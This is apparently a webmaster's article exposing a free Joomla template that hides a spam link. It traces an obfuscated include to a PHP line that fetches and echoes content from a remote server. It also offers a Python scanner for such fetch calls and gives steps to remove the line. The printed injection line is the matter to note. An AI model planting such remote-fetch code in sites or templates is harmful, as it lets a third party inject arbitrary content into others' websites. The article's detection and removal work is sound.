SPAM links in free Joomla templates

Just to make it clear up front, this article is not about removing author credit links from templates with Creative Commons licenses. Authors deserve credit for their work, and their links should be left intact or adjusted to match the site's design.

A friend of mine asked me to create a simple website for him. We chose the Joomla CMS and the Gambling template for Joomla (gameon) from Quality Joomla Templates. Although his site had nothing to do with gambling, we liked the template's structure and were going to customize it heavily anyway.

Once the website was almost ready, we noticed that Google had already indexed it, which was a good thing. What was not so good was that Google had pulled the text "Thanks to online poker sites" from somewhere and was displaying it in the site's description.

I quickly checked the website's source and, sure enough, it contained the following HTML:


<p>Thanks to <a href="http://onlinepokertool.com" title="online poker sites">online poker sites</a></p>

The link was hidden and did not appear as visible text anywhere on the website.

I ran a text search through all the template files and there were no references to poker, gambling or anything similar. It was clear that the template's creators (or somebody who modified the template afterwards) had somehow obfuscated the link to make it difficult to find and remove. I've seen similar behaviour when authors make it difficult to remove credit footer links, which some may justify and some may not. This, though, had nothing to do with legitimate credit. The credit link was at the bottom where it should be, and the online gambling link was a sneaky attempt to plant a hidden spam link in somebody else's website.

A short investigation revealed how this was set up.

How it works

index.php had the following code:


<?php include "html/com_content/archive/component.php"; ?>

This pulled in the following from html/com_content/archive/component.php:


<!-- Joomla (GNU PGL) is one of the most popular open source CMS in the world(content management systems) --></div></div></div></div><div class="back-top"></div><div id="main-content"><?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>

The crucial bit here is

<?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>

This fetches the "Thanks to online poker sites" link from pointlink.net/pk.php and writes it into the page's HTML output.

This way they avoid placing the words "online poker" anywhere in the template's code, which makes detection more difficult. More worryingly, because the response is echoed as-is, they can insert pretty much anything into your website's code by changing the content of pointlink.net/pk.php.
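
A keyword search fails here because the spam text never appears in the template, so a more useful check is to search the template's PHP code for calls that fetch a URL. The Python script below is an added example, not code from the template or from the original article; the names scan_template and build_sample_template are hypothetical, and the sample files are constructed from the snippets quoted above.

```python
import re
import tempfile
from pathlib import Path

# PHP functions/constructs that can load content from a URL given as a string literal.
FETCH_CALL = re.compile(
    r"\b(file_get_contents|fopen|readfile|curl_init|include(?:_once)?|require(?:_once)?)"
    r"\s*\(?\s*['\"](https?://[^'\"]+)['\"]",
    re.IGNORECASE,
)
PHP_BLOCK = re.compile(r"<\?php(.*?)(?:\?>|\Z)", re.DOTALL | re.IGNORECASE)


def scan_template(root):
    """Return (relative_path, line_no, function, url) for each remote fetch in PHP code."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for block in PHP_BLOCK.finditer(text):
            for call in FETCH_CALL.finditer(block.group(1)):
                # Translate the match offset back to a line number in the file.
                offset = block.start(1) + call.start()
                line_no = text.count("\n", 0, offset) + 1
                rel = path.relative_to(root).as_posix()
                findings.append((rel, line_no, call.group(1).lower(), call.group(2)))
    return findings


def build_sample_template(root):
    """Constructed sample reproducing the two files described in the article."""
    root = Path(root)
    inc = root / "html" / "com_content" / "archive"
    inc.mkdir(parents=True)
    (root / "index.php").write_text(
        '<html><body>\n<?php include "html/com_content/archive/component.php"; ?>\n'
        '<a href="http://example.com">static link, not PHP</a>\n</body></html>\n'
    )
    (inc / "component.php").write_text(
        '<!-- comment --></div><div id="main-content">'
        "<?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>\n"
    )


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_template(tmp)
        for rel, line_no, func, url in scan_template(tmp):
            print(f"{rel}:{line_no}: {func} -> {url}")
```

The scan matches only URLs written as string literals, so a template that assembles the address at runtime still needs a manual review of every network-capable call.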

How to remove

Removal is actually pretty simple.

Because component.php contains part of the template's structural markup, you can't simply remove
<?php include "html/com_content/archive/component.php"; ?>

from index.php, as this would break the template.

Option 1:

  • Open html/com_content/archive/component.php and remove
    <?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>

Option 2:

  • Delete
    <?php include "html/com_content/archive/component.php"; ?>

    from index.php and replace it with
    </div></div></div></div><div class="back-top"></div><div id="main-content">

    (taken from html/com_content/archive/component.php)
  • Then you can completely remove html/com_content/archive/component.php.

It seems that the same or similar hidden code appears in some other templates from QualityJoomlaTemplates and FreshJoomlaTemplates, including Business Template for Joomla (JustBusiness), Elegant (Outsourcing), iFreedom, ecoPlanet and others.

I would suggest avoiding these sites and their templates and finding more honest developers who don't try to sneak spam links into your website.
